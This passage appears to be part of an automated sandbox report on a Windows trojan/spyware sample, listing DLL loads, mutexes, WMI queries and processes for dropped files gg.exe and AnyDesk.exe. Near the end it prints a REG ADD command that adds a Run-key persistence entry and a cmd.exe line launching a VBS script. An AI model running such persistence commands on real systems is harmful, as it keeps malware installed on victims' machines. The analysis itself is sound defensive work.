                                Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: thumbcache.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dataexchange.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dcomp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: firewallapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwpolicyiomgr.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netutils.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wkscli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: srvcli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: netprofm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: npmproxy.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: winhttp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msimg32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: usp10.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: windowscodecs.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: thumbcache.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: policymanager.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: msvcp110_win.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: wtsapi32.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\AnyDesk.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: version.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dwrite.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: msvcp140_clr0400.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textshaping.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: textinputframework.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coreuicomponents.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: coremessaging.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntmarta.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: secur32.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: sspicli.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: amsi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: userenv.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: rstrtmgr.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ncrypt.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: ntasn1.dll
                                Source: C:\ProgramData\WinNet\gg.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@39/13@3/4
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C229A0 FormatMessageA,GetLastError,19_2_69C229A0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5FFEC LaunchGoogleChrome,CoInitializeEx,CoInitializeSecurity,GetCurrentProcessId,GetShellWindow,GetWindowThreadProcessId,LocalFree,OpenProcess,OpenProcessToken,DuplicateTokenEx,ImpersonateLoggedOnUser,CloseHandle,CloseHandle,CloseHandle,LocalFree,LocalFree,CoCreateInstance,RevertToSelf,CoUninitialize,19_2_69C5FFEC
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C62CE9 LoadResource,LockResource,SizeofResource,19_2_69C62CE9
                                Source: C:\ProgramData\WinNet\gg.exeFile created: C:\Users\user\AppData\Local\SystemCacheJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_7072_6716_0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcstobjmtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6256_3355645616_1_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7072_3382200878_1_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_11
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_13
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_12
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Session\1\ad_connect_queue_5768_3380577324_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6256_3355645616_0_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_7072_2004_0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_7072_3382200878_0_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_19
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_18
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
                                Source: C:\ProgramData\WinNet\gg.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_808_lsystem_mtx
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_6
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_5
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_4
                                Source: C:\ProgramData\WinNet\AnyDesk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ad_qipcmtx_5768_6960_3
                                Source: C:\ProgramData\WinNet\AnyDesk.exeFile created: C:\Users\user\AppData\Local\Temp\gcapi.dll
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                Source: SysrI6zSkJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
